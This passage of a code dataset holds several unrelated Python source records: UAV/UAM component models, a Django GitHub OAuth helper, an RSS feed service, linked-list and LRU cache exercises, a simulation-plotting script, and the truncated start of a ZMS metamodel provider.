Optional[float] = Field(\n None, description=\"The Side Mount Offset\", alias=\"SIDEMOUNT_OFFSET\"\n )\n\n offset: Optional[float] = Field(None, description=\"Offset\", alias=\"OFFSET\")\n\n num_horizontal_conn: Optional[int] = Field(\n None, description=\"The number of horizontal connections\", alias=\"NUMHORZCONN\"\n )\n\n angle_horizontal_connection: Optional[float] = Field(\n None, description=\"The angle of horizontal connections\", alias=\"ANGHORZCONN\"\n )\n\n\nclass Tube(Component):\n length: float = Field(..., description=\"Length of the tube\", alias=\"Length\")\n\n od: float = Field(..., description=\"The outer diameter\", alias=\"OD\")\n\n id: float = Field(..., description=\"The inner diameter\", alias=\"ID\")\n\n rot_2: Optional[float] = Field(\n default=None, description=\"The ROT2 parameter\", alias=\"ROT2\"\n )\n\n\nclass Hub(Component):\n num_of_horizontal_connections: int = Field(\n ..., description=\"The number of horizontal connections\", alias=\"NUMHORZCONN\"\n )\n\n angle_of_horizontal_connections: float = Field(\n ..., description=\"The angle of horizontal connection\", alias=\"ANGHORZCONN\"\n )\n\n\nclass 
Orient(Component):\n z_angle: float = Field(..., description=\"The Z-Angle\", alias=\"Z_ANGLE\")\n\n\nclass CarbonFiberPlate(Component):\n width: float = Field(..., description=\"The width of the CFP\", alias=\"WIDTH\")\n\n thickness: float = Field(\n ..., description=\"The Thickness of the plate\", alias=\"THICKNESS\"\n )\n\n density: float = Field(..., description=\"The density of the plate\", alias=\"DENSITY\")\n\n length: float = Field(..., description=\"The Length of the plate\", alias=\"LENGTH\")\n\n x8_offset: float = Field(..., description=\"X8_OFFSET\", alias=\"X8_OFFSET\")\n\n z6_offset: float = Field(..., description=\"Z6_OFFSET\", alias=\"Z6_OFFSET\")\n\n z8_offset: float = Field(..., description=\"Z8_OFFSET\", alias=\"Z8_OFFSET\")\n\n x6_offset: float = Field(..., description=\"X6_OFFSET\", alias=\"X6_OFFSET\")\n\n z7_offset: float = Field(..., description=\"The Z7_OFFSET\", alias=\"Z7_OFFSET\")\n\n z3_offset: float = Field(..., description=\"The Z3_OFFSET\", alias=\"Z3_OFFSET\")\n\n x5_offset: float = Field(..., description=\"X5_OFFSET\", alias=\"X5_OFFSET\")\n\n x2_offset: float = Field(..., description=\"X2_OFFSET\", alias=\"X2_OFFSET\")\n\n x4_offset: float = Field(..., description=\"X4_OFFSET\", alias=\"X4_OFFSET\")\n\n z1_offset: float = Field(..., description=\"Z1_OFFSET\", alias=\"Z1_OFFSET\")\n\n x1_offset: float = Field(..., description=\"X1_OFFSET\", alias=\"X1_OFFSET\")\n\n x3_offset: float = Field(..., description=\"X3_OFFSET\", alias=\"X3_OFFSET\")\n\n z4_offset: float = Field(..., description=\"Z4_OFFSET\", alias=\"Z4_OFFSET\")\n\n x7_offset: float = Field(..., description=\"X7_OFFSET\", alias=\"X7_OFFSET\")\n\n z2_offset: float = Field(..., description=\"Z2_OFFSET\", alias=\"Z2_OFFSET\")\n\n z5_offset: float = Field(..., description=\"Z5_OFFSET\", alias=\"Z5_OFFSET\")\n\n\nclass Beam_Cap(Component):\n thickness: float = Field(..., description=\"Thickness\", alias=\"THICKNESS\")\n\n chord: float = Field(..., description=\"CHORD\", alias=\"CHORD\")\n\n\nclass NACA_Port_Connector(Component):\n bottom_connection_disp: float = Field(\n default=0, description=\"BOTTOM_CONNECTION_DISP\", alias=\"BOTTOM_CONNECTION_DISP\"\n )\n\n port_thickness: float = Field(\n default=100, description=\"PORT_THICKNESS\", alias=\"PORT_THICKNESS\"\n )\n\n chord: float = Field(default=500, description=\"CHORD\", alias=\"CHORD\")\n\n thickness: float = Field(default=12, description=\"THICKNESS\", alias=\"THICKNESS\")\n\n\nclass ComponentsRepository:\n \"\"\"The components repository builder class\"\"\"\n\n def __init__(self, creator, components, corpus):\n self.creator = creator\n self.corpus = corpus\n self.components = self._initialize_components(components)\n\n @property\n def all(self):\n return list(self.components.keys())\n\n def __getattr__(self, item):\n if item in self.components:\n return self.components[item]\n else:\n raise AttributeError(\n f\"{self.creator.__name__} {item} is missing from the repository\"\n )\n\n def __getitem__(self, item):\n if isinstance(item, int):\n components = list(self.components.values())\n return components[item]\n else:\n component_names = {\n component.name: component for component in self.components.values()\n }\n\n if item in component_names:\n return component_names[item]\n else:\n raise KeyError(\n f\"{self.creator.__name__} {item} is missing from the repository\"\n )\n\n def __iter__(self):\n for component in self.components.values():\n yield component\n\n def __len__(self):\n return len(self.components)\n\n def to_csv(self, filename):\n \"\"\"Write these components to a 
csv_file\"\"\"\n keys = {field.alias for _, field in self.creator.__fields__.items()}\n\n if next(iter(self.components.values())).should_swap_aliases():\n reverse_swap_aliases = {\n val: key for key, val in self.creator.__swap_aliases__.items()\n }\n for key in list(keys):\n if key in reverse_swap_aliases:\n keys.remove(key)\n keys.add(reverse_swap_aliases[key])\n\n with open(filename, \"w\", newline=\"\") as op_csv:\n dict_writer = csv.DictWriter(op_csv, keys)\n dict_writer.writeheader()\n for component in self.components.values():\n dict_writer.writerow(component.dict(by_alias=True))\n\n def _initialize_components(self, components):\n component_instances = {}\n\n for component_dict in components:\n object_dict = self._fix_parametric_properties(component_dict)\n object_dict[\"corpus\"] = self.corpus\n component_instance = self.creator.parse_obj(object_dict)\n component_instances[component_instance.name] = component_instance\n\n return component_instances\n\n def _fix_parametric_properties(self, component_dict):\n parametric_properties = {}\n all_properties = {}\n for key, value in component_dict.items():\n if key.startswith(\"para\"):\n splitted = key.split(\"_\")\n parameter_name = \"_\".join(splitted[1:-1])\n if parameter_name not in parametric_properties:\n parametric_properties[parameter_name] = {}\n if splitted[-1] == \"[]AssignedValue\":\n parametric_properties[parameter_name][\"value\"] = value\n if splitted[-1] == \"[]Minimum\":\n parametric_properties[parameter_name][\"min\"] = value\n if splitted[-1] == \"[]Maximum\":\n parametric_properties[parameter_name][\"max\"] = value\n else:\n all_properties[key] = value\n\n assigned_values = dict(\n map(lambda v: (v[0], v[1][\"value\"]), parametric_properties.items())\n )\n\n all_properties.update(assigned_values)\n\n return all_properties\n\n def __repr__(self):\n return f\"<{self.creator.__name__} Library, Count: {self.__len__()}, Corpus: {self.corpus}>\"\n\n\nclass Cylinder(Component):\n wall_thickness: float = Field(default=3.0, alias=\"WALL_THICKNESS\")\n\n left_conn_display: float = Field(default=0.0, alias=\"LEFT_CONN_DISP\")\n\n top_conn_display: float = Field(default=0.0, alias=\"TOP_CONN_DISP\")\n\n right_conn_display: float = Field(default=0.0, alias=\"RIGHT_CONN_DISP\")\n\n bottom_conn_display: float = Field(default=0.0, alias=\"BOTTOM_CONN_DISP\")\n\n diameter: float = Field(default=0.0, alias=\"DIAMETER\")\n\n port_thickness: float = Field(default=100.0, alias=\"PORT_THICKNESS\")\n\n length: float = Field(default=100.0, alias=\"LENGTH\")\n\n front_angle: float = Field(default=1000.0, alias=\"FRONT_ANGLE\")\n\n\nclass Fuselage(Component):\n wall_thickness: float = Field(\n ..., description=\"WALL THICKNESS\", alias=\"WALL_THICKNESS\"\n )\n\n seat_1_lr: float = Field(default=100, description=\"SEAT 1 LR\", alias=\"SEAT_1_LR\")\n\n floor_height: float = Field(\n default=100, description=\"FLOOR HEIGHT\", alias=\"FLOOR_HEIGHT\"\n )\n\n port_thickness: float = Field(\n default=100, description=\"PORT THICKNESS\", alias=\"PORT_THICKNESS\"\n )\n\n middle_length: float = Field(\n default=100, description=\"MIDDLE LENGTH\", alias=\"MIDDLE_LENGTH\"\n )\n\n bottom_port_disp: float = Field(\n default=100, description=\"BOTTOM PORT DISP\", alias=\"BOTTOM_PORT_DISP\"\n )\n\n length: float = Field(default=100, description=\"LENGTH\", alias=\"LENGTH\")\n\n seat_2_fb: float = Field(default=100, description=\"SEAT 2 FB\", alias=\"SEAT_2_FB\")\n\n seat_1_fb: float = Field(default=100, description=\"SEAT 1 FB\", alias=\"SEAT_1_FB\")\n\n 
seat_2_lr: float = Field(default=100, description=\"SEAT 2 LR\", alias=\"SEAT_2_LR\")\n\n tail_diameter: float = Field(\n default=100, description=\"TAIL DIAMETER\", alias=\"TAIL_DIAMETER\"\n )\n\n sphere_diameter: float = Field(\n default=100, description=\"SPHERE DIAMETER\", alias=\"SPHERE_DIAMETER\"\n )\n\n right_port_disp: float = Field(\n default=100, description=\"RIGHT PORT DISP\", alias=\"RIGHT_PORT_DISP\"\n )\n\n top_port_disp: float = Field(\n default=100, description=\"TOP PORT DISP\", alias=\"TOP_PORT_DISP\"\n )\n\n left_port_disp: float = Field(\n default=100, description=\"LEFT PORT DISP\", alias=\"LEFT_PORT_DISP\"\n )\n\n\nclass Passenger(Component):\n\n weight: float = Field(..., description=\"WEIGHT\", alias=\"WEIGHT\")\n\n\nclass Beam(Component):\n top_conn_disp: float = Field(\n default=0.0, description=\"TOP CONN DISP\", alias=\"TOP_CONN_DISP\"\n )\n\n chord: float = Field(default=500.0, description=\"CHORD\", alias=\"CHORD\")\n\n thickness: float = Field(default=40.0, description=\"THICKNESS\", alias=\"THICKNESS\")\n\n span: float = Field(default=1000.0, description=\"SPAN\", alias=\"SPAN\")\n\n bottom_conn_disp: float = Field(\n default=0.0, description=\"BOTTOM CONN DISP\", alias=\"BOTTOM_CONN_DISP\"\n )\n\n\nclass Cylinder_Flip(Component):\n wall_thickness: float = Field(\n ..., description=\"WALL THICKNESS\", alias=\"WALL_THICKNESS\"\n )\n\n length: float = Field(..., description=\"LENGTH\", alias=\"LENGTH\")\n\n diameter: float = Field(default=0, description=\"DIAMETER\", alias=\"DIAMETER\")\n\n\nall_uav_components = get_data_file_path(\"all_uav_components.json\")\nwith open(all_uav_components) as json_file:\n all_uav_components = json.load(json_file)\n\nall_uam_components = get_data_file_path(\"all_uam_components.json\")\nwith open(all_uam_components) as json_file:\n all_uam_components = json.load(json_file)\n\n\ndef get_corpus_components(corpus):\n if corpus == \"uav\":\n all_components = all_uav_components\n elif corpus == \"uam\":\n all_components = all_uam_components\n else:\n raise ValueError(\"corpus can only be either `uav` or `uam`\")\n return all_components\n\n\ndef get_all_components_of_class(cls, corpus):\n all_components = get_corpus_components(corpus)\n for key, value in all_components.items():\n if value[\"Classification\"] == cls.__name__:\n value[\"Name\"] = key\n yield value\n\n\ndef build_components(cls, corpus):\n return ComponentsRepository(\n creator=cls, components=get_all_components_of_class(cls, corpus), corpus=corpus\n )\n\n\ndef build_components_of_class(cls, names, corpus):\n return ComponentsRepository(\n creator=cls,\n components=(\n {\n \"Name\": comp_name,\n **get_corpus_components(corpus)[comp_name],\n \"Classification\": cls.__name__,\n }\n for comp_name in names\n ),\n corpus=corpus,\n )\n\n\ndef build_tubes(names, corpus):\n for tube_name in names:\n corpus_components = get_corpus_components(corpus)\n if \"para_Length_[]AssignedValue\" not in corpus_components[tube_name]:\n corpus_components[tube_name][\n \"para_Length_[]AssignedValue\"\n ] = corpus_components[tube_name].pop(\"LENGTH\", 200.0)\n\n return build_components_of_class(Tube, names, corpus=corpus)\n","repo_name":"symbench/symbench-athens-client","sub_path":"symbench_athens_client/models/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":43963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
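# A minimal, self-contained sketch of the Field-alias + pre-validator pattern that the
# component models above rely on: catalog values arrive as strings keyed by alias, and
# comma-separated entries such as "6,7" are parsed into float tuples before validation.
# `MiniMotor` is a hypothetical model for illustration only; it assumes the pydantic v1
# API (Field/validator) that this file itself uses.
from typing import Optional, Tuple, Union

from pydantic import BaseModel, Field, validator


class MiniMotor(BaseModel):
    kv: float = Field(..., alias="KV")
    prop_size_rec: Optional[Union[float, Tuple[float, ...]]] = Field(None, alias="PROP_SIZE_REC")

    @validator("prop_size_rec", pre=True)
    def parse_csv_pair(cls, value):
        # "6,7" -> (6.0, 7.0); plain numbers pass through unchanged
        if isinstance(value, str) and "," in value:
            return tuple(float(v) for v in value.split(","))
        return value


m = MiniMotor.parse_obj({"KV": "3100.0", "PROP_SIZE_REC": "6,7"})
print(m.kv, m.prop_size_rec)  # 3100.0 (6.0, 7.0)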
+{"seq_id":"16133179958","text":"import requests\nimport json\n\nfrom django.conf import settings\n\n\ndef get_github_user_info(access_token):\n url = \"https://api.github.com/user?access_token={token}\".format(token=access_token)\n res = requests.get(url)\n return res.json()\n\n\ndef get_access_token(request):\n code = request.GET['code']\n payload = {\n \"client_id\": settings.SOCIAL_AUTH_GITHUB_KEY,\n \"client_secret\": settings.SOCIAL_AUTH_GITHUB_SECRET,\n \"code\": code,\n }\n headers = {'Content-Type': 'application/json'}\n res = requests.post('https://github.com/login/oauth/access_token',\n data=json.dumps(payload), headers=headers)\n if res.status_code != 200:\n raise Exception(\"Github authentication error\")\n res_params = {k: v for k, v in\n [p.split('=') for p in res.text.split('&')]}\n return res_params['access_token']\n","repo_name":"c-bata/django-auth-example","sub_path":"socials/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"70"}
+{"seq_id":"30196333262","text":"from apps.usercategories.models import Category\nfrom apps.userfeeds.models import UserFeed\n\nimport feedfinder2\nimport feedparser\nimport logging\nfrom djangofeeds.models import Feed\nfrom djangofeeds.models import Category as BaseFeedCategory\n\n\nclass FeedWriteService(object):\n\n def __init__(self, user, logger=None, dry_run=False):\n self.logger = logger or logging.getLogger(__name__)\n self.dry_run = dry_run\n self.user = user\n\n def save(self, data):\n return self.rsave([data])\n\n def rsave(self, data):\n \"\"\"\n saves the Information of a FeedInfo object recursively to the database\n :param data: Items to save FeedInfoObject\n \"\"\"\n for item in data:\n if isinstance(item, FeedInfo):\n save_func = self.save_feed\n else:\n save_func = self.save_category\n self.logger.info(\"Saving %s\", item)\n save_func(item)\n\n def save_feed(self, feed_item):\n try:\n feed = Feed.objects.get(feed_url=feed_item.feed_url)\n except Feed.DoesNotExist:\n self.logger.info(\"Feed %s does not exist.\", feed_item.feed_url)\n feed = Feed(\n feed_url=feed_item.feed_url,\n name=feed_item.title\n )\n if not self.dry_run:\n feed.save()\n self.logger.info('Feed saved')\n feed.categories.add(BaseFeedCategory.objects.get(name=UserFeed.default_base_feed_category_name))\n try:\n user_feed = UserFeed.objects.get(feed=feed, user=self.user)\n except UserFeed.DoesNotExist:\n user_feed = UserFeed.objects.create(\n feed=feed,\n user=self.user\n )\n self.logger.info('User feed %s created for %s', feed_item.feed_url, self.user)\n if feed_item.category:\n feed_category = Category.objects.get(name=feed_item.category.name)\n user_feed.categories.add(feed_category)\n if not self.dry_run:\n user_feed.save()\n\n def save_category(self, category_item):\n if not Category.objects.filter(name=category_item.name).exists():\n category = Category(name=category_item.name)\n if not self.dry_run:\n category.save()\n self.rsave(category_item)\n\n\nclass FeedInfo(object):\n def __init__(self,\n feed_type,\n feed_url,\n html_url,\n title,\n category=None\n ):\n self.feed_type = feed_type\n self.feed_url = feed_url\n self.html_url = html_url\n self.title = title\n self.category = category\n\n def __str__(self):\n return self.title\n\n\nclass CategoryInfo(object):\n class CategoryInfoIter(object):\n\n def __init__(self, category_info):\n self._items = category_info._items\n\n def next(self):\n if not hasattr(self, '_iter'):\n self._iter = iter(self._items)\n return self._iter.next()\n\n def __init__(self, name, items=[]):\n super(CategoryInfo, self).__init__()\n self.name = name\n self._items = set()\n for item in items:\n self._items.add(item)\n\n def __iter__(self):\n return CategoryInfo.CategoryInfoIter(self)\n\n def add(self, item):\n self._items.add(item)\n\n def __str__(self):\n return self.name\n\n\nclass FeedInformationService(object):\n\n parse_exception_key = 'bozo_exception'\n\n def __init__(self, feed_url, accept_fuzzy=False):\n self.feed_url = feed_url\n self.accept_fuzzy = accept_fuzzy\n\n def parse(self):\n parse_result = feedparser.parse(self.feed_url)\n if self.accept_fuzzy and FeedInformationService.parse_exception_key in parse_result:\n feeds = feedfinder2.find_feeds(self.feed_url)\n parse_result = map(feedparser.parse, feeds)\n else:\n parse_result = [parse_result]\n\n result = [FeedInfo(\n feed_type=parsed_result['version'],\n feed_url=parsed_result['href'],\n html_url=parsed_result['feed']['link'],\n title=parsed_result['feed']['title']) for parsed_result in parse_result]\n return 
result\n","repo_name":"jo-soft/jadfr","sub_path":"jadfr/apps/userfeeds/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"7995443148","text":"\nclass ListNode:\n def __init__(self, val):\n self.val = val\n self.next = None\n\n def __repr__(self):\n if self.next is None:\n return f'{self.val}'\n else:\n return f'{self.val} -> {self.next}'\n\n # return f'{self.val}, {{next:{self.next}}}'\n\n\nclass DoublyListNode:\n def __init__(self, k, v):\n self.key = k\n self.val = v\n self.prev = None\n self.next = None\n\n\nclass MyLinkedList:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.head = ListNode(None)\n self.tail = self.head\n self.size = 0\n\n def _print_(self):\n p = self.head.next\n while p:\n print(p.val, end=' ')\n p = p.next\n print('')\n\n def get(self, index: int) -> int:\n \"\"\"\n Get the value of the index-th node in the linked list. If the index is invalid, return -1.\n \"\"\"\n print('get', index, self.size)\n self._print_()\n\n if index >= self.size:\n return -1\n i = -1\n p = self.head\n while p:\n p = p.next\n i += 1\n if i == index:\n return p.val\n return -1\n\n def addAtHead(self, val: int) -> None:\n \"\"\"\n Add din node of value val before the first element of the linked list.\n After the insertion, the new node will be the first node of the linked list.\n \"\"\"\n p = ListNode(val)\n p.next = self.head.next\n self.head.next = p\n if self.tail == self.head:\n self.tail = p\n self.size += 1\n\n def addAtTail(self, val: int) -> None:\n \"\"\"\n Append din node of value val to the last element of the linked list.\n \"\"\"\n print('tail=', self.tail.val)\n p = ListNode(val)\n p.next = self.tail.next\n self.tail.next = p\n self.tail = p\n self.size += 1\n self._print_()\n\n def addAtIndex(self, index: int, val: int) -> None:\n \"\"\"\n Add din node of value val before the index-th node in the linked list.\n If index equals to the length of linked list, the node will be appended\n to the end of linked list. 
If index is greater than the length, the\n node will not be inserted.\n \"\"\"\n if index == self.size:\n self.addAtTail(val)\n elif index < self.size:\n i = -1\n q = p = self.head\n while p:\n q = p\n p = p.next\n i += 1\n if i == index:\n break\n if q:\n node = ListNode(val)\n node.next = q.next\n q.next = node\n if self.tail == self.head:\n self.tail = node\n self.size += 1\n\n def deleteAtIndex(self, index: int) -> None:\n \"\"\"\n Delete the index-th node in the linked list, if the index is valid.\n \"\"\"\n if index < self.size:\n i = -1\n q = p = self.head\n while p:\n q = p\n p = p.next\n i += 1\n if i == index:\n break\n if q and p:\n if p == self.tail:\n self.tail = q\n q.next = p.next\n p.next = None\n del p\n self.size -= 1\n\n\nclass MyDoublyList:\n # used for LRU cache\n def __init__(self):\n self.head = DoublyListNode(None, None)\n self.head.next = self.head\n self.head.prev = self.head\n self.size = 0\n\n def get(self, pt):\n return pt.key, pt.val\n\n def set(self, pt, key=None, val=None):\n if key:\n pt.key = key\n if val:\n pt.val = val\n\n def is_tail(self, pt):\n return pt == self.head.prev and pt != self.head\n\n def pop_head(self):\n if self.head.next != self.head:\n return self.remove(self.head.next)\n return None\n\n def remove(self, pt):\n q = pt.prev\n t = pt.next\n q.next = t\n t.prev = q\n\n pt.next = None\n pt.prev = None\n self.size -= 1\n return pt\n\n def insert(self, pt):\n pt.next = self.head\n pt.prev = self.head.prev\n self.head.prev = pt\n pt.prev.next = pt\n self.size += 1\n return pt\n\n def print(self):\n p = self.head.next\n while p != self.head:\n print(\"[%s:%s]->\" % (p.key, p.val), end='')\n p = p.next\n print('Null')\n\n\nclass LRUCache:\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.cache = MyDoublyList()\n self.key_to_ptr = {}\n\n def get(self, key: int) -> int:\n p = self.key_to_ptr.get(key, None)\n if not p:\n return -1\n if not self.cache.is_tail(p):\n p = self.cache.remove(p)\n self.cache.insert(p)\n return p.val\n\n def put(self, key: int, value: int) -> None:\n p = self.key_to_ptr.get(key, None)\n if p:\n if not self.cache.is_tail(p):\n p = self.cache.remove(p)\n self.cache.insert(p)\n self.cache.set(p, key=p.key, val=value)\n else:\n if self.cache.size >= self.capacity:\n pt = self.cache.pop_head()\n self.key_to_ptr.pop(pt.key)\n if pt:\n del pt\n p = DoublyListNode(key, v=value)\n self.cache.insert(p)\n self.key_to_ptr[key] = p\n\n\nclass Solution_92:\n def reverseBetween(self, head, m, n):\n\n if m == n:\n return head\n new_head = ListNode(None)\n new_head.next = head\n prev = q = p = new_head\n cnt = 0\n while p and cnt <= n:\n\n if cnt < m:\n prev = q = p\n p = p.next\n elif cnt <= n:\n t = p.next\n p.next = q\n q = p\n p = t\n cnt += 1\n\n prev.next.next = p\n prev.next = q\n\n return new_head.next\n\n\nclass Solution_147:\n # 链表插入排序\n\n def insertionSortList(self, head: ListNode) -> ListNode:\n if not head:\n return head\n\n dummy = prev = ListNode(float('-inf'))\n dummy.next = head\n\n while head and head.next:\n if head.val <= head.next.val:\n head = head.next\n else:\n p = head.next\n t = head.next.next\n head.next = t # 把head.next从链上取下\n while p.val > prev.next.val:\n prev = prev.next\n\n next_prev = prev.next\n prev.next = p\n p.next = next_prev\n prev = dummy\n\n return dummy.next\n\n\nclass Solution_25:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n # constant space, do it in-place\n def _reverse(h):\n cur = h.next\n prev = h\n h.next = None\n while cur:\n next_node = cur.next\n 
cur.next = prev\n\n prev = cur\n cur = next_node\n return prev, h\n # reverse k-Group\n # last_tail.next = cur_head\n dummy = last_tail = ListNode(None)\n p = head\n h = head\n cnt = 0\n while p:\n cnt += 1\n if cnt == k:\n tmp = p.next\n p.next = None\n h, t = _reverse(h)\n last_tail.next = h\n last_tail = t\n\n h = tmp\n cnt = 0\n p = h\n else:\n p = p.next\n if cnt > 0:\n last_tail.next = h\n return dummy.next\n\n\n# class used by 138\nclass Node:\n def __init__(self, val, next, random):\n self.val = val\n self.next = next\n self.random = random\n\n\nclass Solution_138:\n def copyRandomList(self, head: 'Node') -> 'Node':\n if not head:\n return None\n p = head\n while p:\n np = Node(p.val, None, None)\n t = p.next\n p.next = np\n np.next = t\n p = np.next\n\n p = head\n while p:\n np = p.next\n if p.random:\n # print(p,np)\n np.random = p.random.next\n p = np.next\n p = head\n np_head = head.next\n while p:\n np = p.next\n p.next = np.next\n if p.next:\n np.next = p.next.next\n else:\n np.next = None\n p = p.next\n return np_head","repo_name":"hughian/OJ","sub_path":"LeetCode/LeetCode/LinkedList.py","file_name":"LinkedList.py","file_ext":"py","file_size_in_byte":8745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
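# A quick, deterministic exercise of the LRUCache class above (LeetCode 146 semantics);
# expected outputs are noted in the comments:
cache = LRUCache(2)
cache.put(1, 1)
cache.put(2, 2)
print(cache.get(1))  # 1
cache.put(3, 3)      # evicts key 2 (least recently used)
print(cache.get(2))  # -1
cache.put(4, 4)      # evicts key 1
print(cache.get(1))  # -1
print(cache.get(3))  # 3
print(cache.get(4))  # 4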
+{"seq_id":"39122490392","text":"import os\nimport subprocess\nimport matplotlib.pyplot as plt\nfrom multiprocessing import Pool, Manager\nfrom simulation import *\n\n\nif __name__ == \"__main__\":\n manager = Manager()\n # Declare the configurations\n migration_modes_join = [\"no-migration\", \"all-at-once\", \"lazy\"]\n migration_modes_aggregation = [\"no-migration\", \"all-at-once\", \"megaphone\", \"meces\", \"lazy\"]\n migration_modes_join_aggregation = [\"no-migration\", \"all-at-once\", \"megaphone\", \"meces\", \"lazy\"]\n migration_modes_join_aggregation_max_utility = [\"no-migration\", \"utility\", \"lazy\"]\n tuples_numbers = [1, 10, 100, 1000, 10000]\n window_jump_times = [100, 500, 1000, 5000, 10000]\n proportion_joinable_tuples = [0.001, 0.1, 0.4, 1]\n batch_size = 1\n number_window_extents = 100\n\n # Run Id counter\n run_id_counter = 1\n\n # Declare the YAML configuration files\n yaml_files = ['join-test.yaml', 'aggregation-test.yaml', 'join-and-aggregation-test.yaml',\n 'join-and-aggregation-test.yaml', 'join-and-aggregation-max-utility-test.yaml']\n\n # Process each type of query separately\n queries = ['Join Query', 'Timed Aggregation Query', 'Join -> Timed Aggregation Query (Minimize Latency)',\n 'Join -> Timed Aggregation Query (Minimize Latency)',\n 'Join -> Timed Aggregation Query (Maximize Utility)']\n configs = [migration_modes_join, migration_modes_aggregation, migration_modes_join_aggregation,\n migration_modes_join_aggregation, migration_modes_join_aggregation_max_utility]\n x_params = ['percentage-A-tuples-join', 'tuples-between-join', 'time-between-B-tuples', 'percentage-A-tuples-join']\n x_values = [proportion_joinable_tuples, window_jump_times, proportion_joinable_tuples, window_jump_times,\n proportion_joinable_tuples]\n\n # Create dictionaries to store latency and deviation results\n latency_results = manager.dict()\n deviation_results = manager.dict()\n\n results_path = f\"expose/Results/raw-data\"\n\n no_migration_latency_results = manager.dict()\n no_migration_deviation_results = manager.dict()\n\n pool = Pool()\n manager = Manager()\n run_id_counter = 1 # Initialize run ID counter\n async_results = [] # Store the AsyncResult objects here\n for query, migration_modes, x_param, x_values, yaml_file in zip(queries, configs, x_params, x_values, yaml_files):\n data_by_migration_mode = manager.dict()\n\n # For each x_value, run the simulations for all migration modes\n for x_value in x_values:\n # First, run the no-migration case\n simulation_args = (\n query, \"no-migration\", x_value, x_param, yaml_file, run_id_counter, results_path, latency_results,\n deviation_results, no_migration_latency_results, no_migration_deviation_results, data_by_migration_mode\n )\n print(\"Before pool.apply\")\n async_result = pool.apply_async(run_simulation, (simulation_args,))\n async_results.append(async_result)\n print(\"After pool.apply\")\n\n # Call get() on each AsyncResult to wait for the tasks to complete\n for async_result in async_results:\n async_result.get()\n\n # Then, run the other migration modes\n for migration_mode in migration_modes:\n if migration_mode != \"no-migration\":\n simulation_args = (\n query, migration_mode, x_value, x_param, yaml_file, run_id_counter, results_path, latency_results,\n deviation_results, no_migration_latency_results, no_migration_deviation_results,\n data_by_migration_mode)\n async_result = pool.apply_async(run_simulation, (simulation_args,))\n async_results.append(async_result)\n # Call get() on each AsyncResult to wait for the 
tasks to complete\n for async_result in async_results:\n async_result.get()\n\n # After all simulations for this x_value, plot the results\n for result_type, results_dict, y_label in [(\"latency\", latency_results, 'Average Latency'),\n (\"deviation\", deviation_results, 'Average Deviation')]:\n plt.figure()\n for migration_mode in migration_modes:\n # Get the results for this migration mode\n results = results_dict[migration_mode]\n # Create lists of x values and y_values\n x_values = sorted(results.keys())\n y_values = [results[x] for x in x_values]\n plt.plot(x_values, y_values, label=migration_mode)\n\n plt.title(f'Average {result_type.capitalize()} for {query} and Different Migration Modes')\n plt.xlabel(x_param)\n plt.ylabel(y_label)\n plt.legend()\n plt.savefig(f\"{results_path}/{result_type}_{query.replace(' ', '_')}_{run_id_counter}.png\")\n plt.close()\n\n # Increment the run ID counter after all migration modes have been simulated for the current x_value\n run_id_counter += 1\n\n pool.close()\n","repo_name":"espv/DCEP-Sim","sub_path":"scripts/lazy-results-analysis-multithreaded.py","file_name":"lazy-results-analysis-multithreaded.py","file_ext":"py","file_size_in_byte":5248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
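# The Pool/Manager pattern used above, reduced to a runnable sketch: workers write
# into a Manager-backed dict, and calling .get() on each AsyncResult both waits for
# completion and re-raises any worker exception that apply_async would otherwise
# swallow silently. The work function here is a stand-in, not the real simulation.
from multiprocessing import Pool, Manager

def work(args):
    key, shared = args
    shared[key] = key * key  # simulate a result written by the worker

if __name__ == "__main__":
    manager = Manager()
    shared = manager.dict()
    with Pool(2) as pool:
        results = [pool.apply_async(work, ((k, shared),)) for k in range(4)]
        for r in results:
            r.get()  # blocks until done; surfaces worker exceptions
    print(dict(shared))  # {0: 0, 1: 1, 2: 4, 3: 9}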
+{"seq_id":"24015560609","text":"################################################################################\r\n# ZMSMetamodelProvider.py\r\n#\r\n# This program is free software; you can redistribute it and/or\r\n# modify it under the terms of the GNU General Public License\r\n# as published by the Free Software Foundation; either version 2\r\n# of the License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with this program; if not, write to the Free Software\r\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n################################################################################\r\n\r\n\r\n# Imports.\r\nfrom Products.PageTemplates.PageTemplateFile import PageTemplateFile\r\nimport copy\r\nfrom zope.interface import implementer\r\n# Product Imports.\r\nfrom Products.zms import standard\r\nfrom Products.zms import IZMSConfigurationProvider, IZMSRepositoryProvider\r\nfrom Products.zms import IZMSMetamodelProvider, ZMSMetaobjManager, ZMSMetadictManager\r\nfrom Products.zms import ZMSItem\r\n\r\n\r\n################################################################################\r\n################################################################################\r\n###\r\n### Class\r\n###\r\n################################################################################\r\n################################################################################\r\n@implementer(\r\n IZMSConfigurationProvider.IZMSConfigurationProvider,\r\n IZMSMetamodelProvider.IZMSMetamodelProvider,\r\n IZMSRepositoryProvider.IZMSRepositoryProvider,)\r\nclass ZMSMetamodelProvider(\r\n ZMSItem.ZMSItem,\r\n ZMSMetaobjManager.ZMSMetaobjManager,\r\n ZMSMetadictManager.ZMSMetadictManager):\r\n\r\n # Properties.\r\n # -----------\r\n meta_type = 'ZMSMetamodelProvider'\r\n icon_clazz = \"icon-briefcase\"\r\n\r\n # Management Options.\r\n # -------------------\r\n manage_options_default_action = '../manage_customize'\r\n def manage_options(self):\r\n return [self.operator_setitem( x, 'action', '../'+x['action']) for x in copy.deepcopy(self.aq_parent.manage_options())]\r\n\r\n manage_sub_options__roles__ = None\r\n def 